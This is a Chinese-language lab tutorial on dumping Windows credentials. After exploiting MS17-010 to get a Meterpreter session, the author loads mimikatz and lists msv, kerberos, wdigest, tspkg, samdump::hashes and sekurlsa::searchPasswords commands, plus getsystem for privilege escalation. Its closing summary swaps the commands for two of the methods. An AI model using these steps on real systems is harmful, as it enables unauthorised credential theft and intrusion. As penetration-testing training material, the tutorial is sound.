Meterpreter中使用mimikatz获取Windows密码

1、测试环境

  • 靶机:Windows 7 专业版
  • 攻击机:Kali 2.0
  • 工具:Metasploit(msf)

前提:靶机必须是登入状态

2、漏洞利用

这里使用MS17-010漏洞对靶机进行渗透并反弹到meterpreter。
file

查看当前权限:

如图所示,此处为管理员权限。
file

如果不是管理员权限,请使用getsystem命令以获取管理员权限。

3、获取密码

加载mimikatz模块:
file

接下来有几种方法可以获取密码。

方法一:
获取登录密码的hash值。

msv

file

然后获取明文密码:

kerberos

获取到密码为Network@sec
file

方法二:
使用另一种方法获取hash值:

mimikatz_command -f samdump::hashes

file

获取明文密码:

mimikatz_command -f sekurlsa::searchPasswords

获取到密码为Network@sec
file

方法三:
最简单的方法,加载mimikatz后直接使用该命令:

wdigest

获取到密码为Network@sec
file

方法四:
同上,加载mimikatz后直接使用:

tspkg

获取到密码为Network@sec
file

总结:

方法一:
load mimikatz  # 加载mimikatz
msv  # 获取hash值
kerberos  # 获取明文

方法二:
load mimikatz  # 加载mimikatz
wdigest  # 获取系统账户信息

方法三:
load mimikatz  # 加载mimikatz
mimikatz_command -f samdump::hashes  # 获取hash值
mimikatz_command -f sekurlsa::searchPasswords  # 获取明文密码

方法四:
load mimikatz  # 加载mimikatz
tspkg  # 获取系统账户信息